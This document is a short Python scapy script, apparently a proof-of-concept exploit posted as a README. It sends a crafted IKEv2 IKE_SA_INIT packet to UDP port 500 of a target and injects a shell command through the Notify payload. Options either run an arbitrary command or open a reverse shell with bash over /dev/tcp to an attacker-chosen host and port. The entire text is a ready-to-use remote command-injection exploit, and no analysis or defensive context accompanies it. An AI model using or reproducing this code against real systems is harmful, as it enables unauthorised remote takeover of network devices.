README.md
Rendering markdown...
#!/usr/bin/python3
import sys
from scapy.all import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("rhost")
parser.add_argument("--cmd")
parser.add_argument("--lhost")
parser.add_argument("--lport")
args = parser.parse_args()
load_contrib('ikev2')
if args.cmd is not None:
cmd = "\";bash -c \"" + args.cmd + "\";echo -n \""
elif args.lhost and args.lport:
cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + args.lhost + "/" + args.lport + " <&1;\";echo -n \""
else:
print("Check your syntax, and try again")
sys.exit()
packet = IP(dst = args.rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))
send(packet)